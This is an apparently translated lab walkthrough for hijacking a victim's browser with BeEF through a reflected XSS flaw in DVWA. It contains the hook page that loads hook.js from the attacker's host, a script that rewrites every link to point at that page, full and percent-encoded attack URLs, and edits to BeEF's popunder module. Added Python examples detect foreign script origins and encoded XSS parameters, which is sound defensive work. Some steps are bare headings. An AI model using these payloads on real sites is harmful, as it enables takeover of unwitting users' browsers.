1.1 Using BeEF to hijack a user's browser
1.1.1 Create the hook page and start Apache
# vim /var/www/html/beef-xss.html
<html>
<head>
<script src='http://192.168.10.180:3000/hook.js'></script>
</head>
<body>
<h1>Hello Welcome to leonshadow !!</h1>
</body>
</html>
# systemctl start apache2.service
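Added example, not part of the original write-up: a Python check from the defending side that lists the external <script> sources of a page and reports any whose origin is neither the page's own nor on an allowlist. Run against the hook page above it singles out hook.js on 192.168.10.180:3000, which is what an integrity monitor for a web front end (or a Content-Security-Policy script-src that omits that origin) is there to catch. The sample page (with one extra inline script added for contrast), the function names and the allowlist are my own.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: the hook page from the walkthrough, plus one inline script
# so the collector has both kinds of <script> to tell apart.
HOOK_PAGE = """<html>
<head>
<script src='http://192.168.10.180:3000/hook.js'></script>
</head>
<body>
<h1>Hello Welcome to leonshadow !!</h1>
<script>console.log('inline');</script>
</body>
</html>"""


class ScriptSourceCollector(HTMLParser):
    """Collect the src of every <script src=...>; inline scripts are only counted."""

    def __init__(self):
        super().__init__()
        self.sources = []
        self.inline_count = 0

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")   # HTMLParser already strips the quotes
        if src:
            self.sources.append(src)
        else:
            self.inline_count += 1


def script_sources(page_html: str) -> list:
    """Return the src of every external script tag in document order."""
    collector = ScriptSourceCollector()
    collector.feed(page_html)
    return collector.sources


def origin_of(url: str) -> str:
    """scheme://host[:port], lower-cased; the port is part of the origin."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def foreign_scripts(page_html: str, page_url: str, allowed_origins: set) -> list:
    """Every script src whose origin is neither the page's own nor allowlisted.

    Relative and protocol-relative src values are resolved against page_url first,
    so '/static/app.js' counts as same-origin and is not reported.
    """
    allowed = {o.lower() for o in allowed_origins} | {origin_of(page_url)}
    return [
        src
        for src in script_sources(page_html)
        if origin_of(urljoin(page_url, src)) not in allowed
    ]


if __name__ == "__main__":
    # Served from the Apache host on port 80, so the hook on port 3000 is foreign.
    for src in foreign_scripts(HOOK_PAGE, "http://192.168.10.180/beef-xss.html", set()):
        print("unexpected script origin:", src)
```

Because the port is part of the origin, the hook served from port 3000 is flagged even when it lives on the same host as the page; that is the same reason a CSP script-src of 'self' would refuse to load it.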
1.1.2 Build the attack payload
<script>
window.onload = function() {
    // rewrite every link on the page so it points at the hook page
    var link = document.getElementsByTagName("a");
    for (j = 0; j < link.length; j++) {
        link[j].href = "http://192.168.10.180/beef-xss.html";
    }
}
</script>
1.1.3 Build and encode the URL
1.1.3.1 Full URL
http://192.168.10.159/DVWA/vulnerabilities/xss_r/?name=<script>window.onload = function() {var link= document.getElementsByTagName("a"); for(j = 0; j < link.length; j++) {link[j].href= " http://192.168.10.180/beef-xss.html";}}</script>
1.1.3.2 URL-encoded form
1.1.3.3 Complete attack URL
http://192.168.10.159/DVWA/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%20%66%6f%72%28%6a%20%3d%20%30%3b%20%6a%20%3c%20%6c%69%6e%6b%2e%6c%65%6e%67%74%68%3b%20%6a%2b%2b%29%20%7b%6c%69%6e%6b%5b%6a%5d%2e%68%72%65%66%3d%20%22%20%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%30%2e%31%38%30%2f%62%65%65%66%2d%78%73%73%2e%68%74%6d%6c%22%3b%7d%7d%3c%2f%73%63%72%69%70%74%3e%0a
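Added example, not from the original write-up: a Python checker in the defender's role for sections 1.1.2 and 1.1.3. It percent-decodes the query string of the attack URL above (including nested encoding, which the single-round decode in a naive filter misses), flags parameters that carry script or event-handler markup, and shows that output-encoding the reflected value before echoing it, the standard fix for a reflected XSS like this DVWA page, leaves it inert. The function names and the marker list are my own.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The encoded attack URL from section 1.1.3.3, used here as the sample input.
ENCODED_URL = "http://192.168.10.159/DVWA/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%20%66%6f%72%28%6a%20%3d%20%30%3b%20%6a%20%3c%20%6c%69%6e%6b%2e%6c%65%6e%67%74%68%3b%20%6a%2b%2b%29%20%7b%6c%69%6e%6b%5b%6a%5d%2e%68%72%65%66%3d%20%22%20%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%30%2e%31%38%30%2f%62%65%65%66%2d%78%73%73%2e%68%74%6d%6c%22%3b%7d%7d%3c%2f%73%63%72%69%70%74%3e%0a"

# Markers that show a query value is carrying markup rather than a name (list is my own).
INJECTION_PATTERNS = [
    re.compile(r"<\s*script", re.I),                            # <script> tags
    re.compile(r"\bon[a-z]+\s*=", re.I),                        # inline handlers: onload=, onerror=, ...
    re.compile(r"javascript\s*:", re.I),                        # javascript: URLs
    re.compile(r"<\s*(iframe|img|svg|object|embed)\b", re.I),   # other script-bearing elements
]


def fully_unquote(value: str, max_rounds: int = 3) -> str:
    """Undo nested percent-encoding (a filter-evasion trick), bounded to max_rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def decode_query(url: str) -> dict:
    """Return {param: [decoded values]} for the URL's query string."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: [fully_unquote(v) for v in vals] for k, vals in params.items()}


def find_injection(url: str) -> dict:
    """Return {param: [matched patterns]} for every parameter that looks like injected markup."""
    hits = {}
    for name, values in decode_query(url).items():
        for value in values:
            markers = [p.pattern for p in INJECTION_PATTERNS if p.search(value)]
            if markers:
                hits.setdefault(name, []).extend(markers)
    return hits


def safe_reflect(value: str) -> str:
    """Output-encode a value before echoing it into HTML; the browser then renders text, not tags."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for param, markers in find_injection(ENCODED_URL).items():
        print(f"suspicious parameter {param!r}: {markers}")
    decoded = decode_query(ENCODED_URL)["name"][0]
    print("escaped reflection:", safe_reflect(decoded)[:60], "...")
```

Used on a web-server access log, the same find_injection call over each request line's URL is a cheap first-pass detector for this payload family; the encoding in 1.1.3.2 does nothing to hide it once the parameter is decoded the way the server decodes it.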
1.1.4 Execute the payload
Click any link that navigates to another page to trigger the XSS:
1.1.5 Working in the BeEF console
1.1.5.1 Log in to BeEF
You can see that a zombie browser has already connected:
1.1.5.3 Open a pop-up window in the hooked browser
- Edit the pop-up:
# cd /usr/share/beef-xss/modules/persistence/popunder_window
# vim command.js
# line 8:
var popunder_url = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html';
# line 16:
window.open(popunder_url, popunder_name, 'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=515,height=320,left=' + (screen.width/2-500) + ',top=' + (screen.height/2-200) + '').blur();
Parameter explanation:
- html: the HTML page the pop-up loads
- width=515: pop-up size; the window is 515 pixels wide
- height=320: pop-up size; the window is 320 pixels high
- left: position of the pop-up on screen; its distance from the left edge of the browser is set to (screen.width/2-500), where screen.width is the screen width
- top: position of the pop-up on screen; its distance from the top edge of the browser is (screen.height/2-200), where screen.height is the screen height
Edit the pop-up content:
# cd /usr/share/beef-xss/extensions/demos/html
# upload demo.png into this directory
# vim plain.html
# insert the following between <body> and </body>
# line 14:
<a href="https://blog.leonshadow.cn" target="_blank"><img src="/demos/demo.png" width="500"></a>
- Run the pop-up from BeEF:
1.1.5.4 View the network topology map
